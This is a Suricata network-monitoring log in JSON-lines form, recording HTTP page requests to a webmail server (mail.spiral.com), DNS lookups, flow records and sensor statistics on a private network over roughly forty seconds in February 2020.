{"timestamp":"2020-02-29T00:13:53.376536+0000","flow_id":218925971392270,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52754,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7921}} 
{"timestamp":"2020-02-29T00:13:54.000207+0000","event_type":"stats","stats":{"uptime":14486,"capture":{"kernel_packets":135553,"kernel_drops":0},"decoder":{"pkts":135569,"bytes":93377242,"invalid":187,"ipv4":134070,"ipv6":8,"ethernet":135569,"raw":0,"null":0,"sll":0,"tcp":128752,"udp":5116,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098784},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2775,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2791,"synack":2782,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1814,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2337,"failed_udp":112},"tx":{"http":4669,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2417}},"flow_mgr":{"closed_pruned":2754,"new_pruned":15,"est_pruned":2379,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":2,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":23800,"memcap_state":0,"memcap_global":0},"http":{"memuse":138450,"memcap":0}}} 
{"timestamp":"2020-02-29T00:13:56.000396+0000","flow_id":886797661356645,"event_type":"flow","src_ip":"192.168.10.122","src_port":51170,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:08:55.311909+0000","end":"2020-02-29T00:08:55.421067+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:13:56.836058+0000","flow_id":1297456683777400,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34824,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8117},"app_proto":"http","fileinfo":{"filename":"\/nag\/","state":"CLOSED","stored":false,"size":33564,"tx_id":0}} {"timestamp":"2020-02-29T00:13:57.000208+0000","flow_id":432368661990283,"event_type":"flow","src_ip":"192.168.10.81","src_port":52746,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":12,"bytes_toserver":1832,"bytes_toclient":8349,"start":"2020-02-29T00:12:50.953227+0000","end":"2020-02-29T00:12:56.254674+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:13:57.001387+0000","flow_id":1905800142540588,"event_type":"flow","src_ip":"192.168.10.81","src_port":52744,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":1082,"bytes_toclient":1019,"start":"2020-02-29T00:12:50.937772+0000","end":"2020-02-29T00:12:56.091654+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:13:57.589667+0000","flow_id":218925971392270,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52754,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7921},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":44801,"tx_id":0}} {"timestamp":"2020-02-29T00:13:57.600559+0000","flow_id":1485649266158063,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":43502,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":61162,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:13:57.709068+0000","flow_id":1485649266158063,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43502,"proto":"UDP","dns":{"type":"answer","id":61162,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:13:57.709068+0000","flow_id":1485649266158063,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43502,"proto":"UDP","dns":{"type":"answer","id":61162,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:13:57.765520+0000","flow_id":218925971392270,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52754,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5464}} {"timestamp":"2020-02-29T00:14:00.000707+0000","flow_id":795898973717572,"event_type":"flow","src_ip":"192.168.10.122","src_port":44755,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:08:59.853060+0000","end":"2020-02-29T00:08:59.961986+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:14:01.000432+0000","event_type":"stats","stats":{"uptime":14493,"capture":{"kernel_packets":135593,"kernel_drops":0},"decoder":{"pkts":135603,"bytes":93394794,"invalid":187,"ipv4":134104,"ipv6":8,"ethernet":135603,"raw":0,"null":0,"sll":0,"tcp":128782,"udp":5120,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098496},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2776,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2792,"synack":2783,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1815,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2339,"failed_udp":112},"tx":{"http":4671,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2419}},"flow_mgr":{"closed_pruned":2756,"new_pruned":15,"est_pruned":2380,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":23470,"memcap_state":0,"memcap_global":0},"http":{"memuse":87581,"memcap":0}}} 
{"timestamp":"2020-02-29T00:14:01.005964+0000","flow_id":1395802825860624,"event_type":"flow","src_ip":"192.168.10.122","src_port":56407,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:09:00.304656+0000","end":"2020-02-29T00:09:00.413211+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:14:02.766663+0000","flow_id":218925971392270,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52754,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5464},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/","state":"CLOSED","stored":false,"size":28285,"tx_id":1}} {"timestamp":"2020-02-29T00:14:05.000841+0000","flow_id":98370530812316,"event_type":"flow","src_ip":"192.168.10.81","src_port":52748,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":1290,"bytes_toclient":810,"start":"2020-02-29T00:12:59.565660+0000","end":"2020-02-29T00:13:04.757093+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:14:05.878088+0000","flow_id":390853513012744,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":37310,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":32867,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:14:05.986371+0000","flow_id":390853513012744,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37310,"proto":"UDP","dns":{"type":"answer","id":32867,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:14:05.986371+0000","flow_id":390853513012744,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37310,"proto":"UDP","dns":{"type":"answer","id":32867,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:14:06.315620+0000","flow_id":756720302109332,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34826,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6756}} {"timestamp":"2020-02-29T00:14:07.002983+0000","flow_id":1205458465593479,"event_type":"flow","src_ip":"192.168.10.122","src_port":58650,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:09:06.858247+0000","end":"2020-02-29T00:09:06.968272+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:14:07.003817+0000","flow_id":1235763754834258,"event_type":"flow","src_ip":"192.168.10.122","src_port":50319,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:09:06.465234+0000","end":"2020-02-29T00:09:06.573102+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:14:07.003916+0000","flow_id":816196989671691,"event_type":"flow","src_ip":"192.168.10.122","src_port":40498,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:09:06.448779+0000","end":"2020-02-29T00:09:06.557375+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:14:08.000400+0000","event_type":"stats","stats":{"uptime":14500,"capture":{"kernel_packets":135612,"kernel_drops":0},"decoder":{"pkts":135615,"bytes":93396136,"invalid":187,"ipv4":134114,"ipv6":8,"ethernet":135615,"raw":0,"null":0,"sll":0,"tcp":128790,"udp":5122,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098496},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2777,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2793,"synack":2784,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_
layer":{"flow":{"http":1815,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2340,"failed_udp":112},"tx":{"http":4672,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2420}},"flow_mgr":{"closed_pruned":2757,"new_pruned":15,"est_pruned":2382,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":22478,"memcap_state":0,"memcap_global":0},"http":{"memuse":87604,"memcap":0}}} {"timestamp":"2020-02-29T00:14:11.000286+0000","flow_id":858648459774048,"event_type":"flow","src_ip":"192.168.10.130","src_port":34810,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":12,"pkts_toclient":13,"bytes_toserver":3106,"bytes_toclient":7263,"start":"2020-02-29T00:12:30.428128+0000","end":"2020-02-29T00:13:10.761246+0000","age":40,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:14:11.001647+0000","flow_id":339305296184252,"event_type":"flow","src_ip":"192.168.10.122","src_port":33829,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:09:10.345020+0000","end":"2020-02-29T00:09:10.453617+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:14:11.316083+0000","flow_id":756720302109332,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34826,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6756},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":33150,"tx_id":0}} {"timestamp":"2020-02-29T00:14:13.001135+0000","flow_id":1076287324585437,"event_type":"flow","src_ip":"192.168.10.122","src_port":37956,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:09:12.622045+0000","end":"2020-02-29T00:09:12.730774+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:14:15.000220+0000","event_type":"stats","stats":{"uptime":14507,"capture":{"kernel_packets":135627,"kernel_drops":0},"decoder":{"pkts":135632,"bytes":93404337,"invalid":187,"ipv4":134129,"ipv6":8,"ethernet":135632,"raw":0,"null":0,"sll":0,"tcp":128805,"udp":5122,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096768},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2777,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2793,"synack":2784,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1816,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":
0,"dns_udp":2340,"failed_udp":112},"tx":{"http":4672,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2420}},"flow_mgr":{"closed_pruned":2758,"new_pruned":15,"est_pruned":2387,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":21817,"memcap_state":0,"memcap_global":0},"http":{"memuse":35749,"memcap":0}}} {"timestamp":"2020-02-29T00:14:16.000255+0000","flow_id":579939444423429,"event_type":"flow","src_ip":"192.168.10.81","src_port":52750,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":19,"pkts_toclient":22,"bytes_toserver":3065,"bytes_toclient":20115,"start":"2020-02-29T00:13:07.293637+0000","end":"2020-02-29T00:13:15.784000+0000","age":8,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:14:18.000797+0000","flow_id":700400392481363,"event_type":"flow","src_ip":"192.168.10.130","src_port":34816,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":8,"bytes_toserver":1095,"bytes_toclient":6515,"start":"2020-02-29T00:13:12.010835+0000","end":"2020-02-29T00:13:17.187494+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:14:22.000276+0000","event_type":"stats","stats":{"uptime":14514,"capture":{"kernel_packets":135627,"kernel_drops":0},"decoder":{"pkts":135632,"bytes":93404337,"invalid":187,"ipv4":134129,"ipv6":8,"ethernet":135632,"raw":0,"null":0,"sll":0,"tcp":128805,"udp":5122,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096192},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2777,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2793,"synack":2784,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1816,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2340,"failed_udp":112},"tx":{"http":4672,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2420}},"flow_mgr":{"closed_pruned":2760,"new_pruned":15,"est_pruned":2387,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":21817,"memcap_state":0,"memcap_global":0},"http":{"memuse":35589,"memcap":0}}} 
{"timestamp":"2020-02-29T00:14:25.000341+0000","flow_id":875772497513137,"event_type":"flow","src_ip":"192.168.10.81","src_port":52752,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":1299,"bytes_toclient":1107,"start":"2020-02-29T00:13:18.871089+0000","end":"2020-02-29T00:13:24.094914+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:14:28.540604+0000","flow_id":645029679087548,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":51842,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":5997,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:14:28.697243+0000","flow_id":645029679087548,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51842,"proto":"UDP","dns":{"type":"answer","id":5997,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:14:28.697243+0000","flow_id":645029679087548,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51842,"proto":"UDP","dns":{"type":"answer","id":5997,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:14:28.779172+0000","flow_id":1080320319612926,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34828,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/nag\/task.php?tasklist=KCDsO_NmBjYX5zVsrCfQDx7&task=CzzvouuXL90PtKLh7taEoDK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu 
Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8792}} {"timestamp":"2020-02-29T00:14:29.000160+0000","event_type":"stats","stats":{"uptime":14521,"capture":{"kernel_packets":135627,"kernel_drops":0},"decoder":{"pkts":135632,"bytes":93404337,"invalid":187,"ipv4":134129,"ipv6":8,"ethernet":135632,"raw":0,"null":0,"sll":0,"tcp":128805,"udp":5122,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095904},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2777,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2793,"synack":2784,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1816,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2340,"failed_udp":112},"tx":{"http":4672,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2420}},"flow_mgr":{"closed_pruned":2761,"new_pruned":15,"est_pruned":2387,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":22148,"memcap_state":0,"memcap_global":0},"http":{"memuse":86225,"memcap":0}}} 
{"timestamp":"2020-02-29T00:14:30.000335+0000","flow_id":1016531461094710,"event_type":"flow","src_ip":"192.168.10.130","src_port":34818,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":1165,"bytes_toclient":643,"start":"2020-02-29T00:13:24.736566+0000","end":"2020-02-29T00:13:29.882017+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 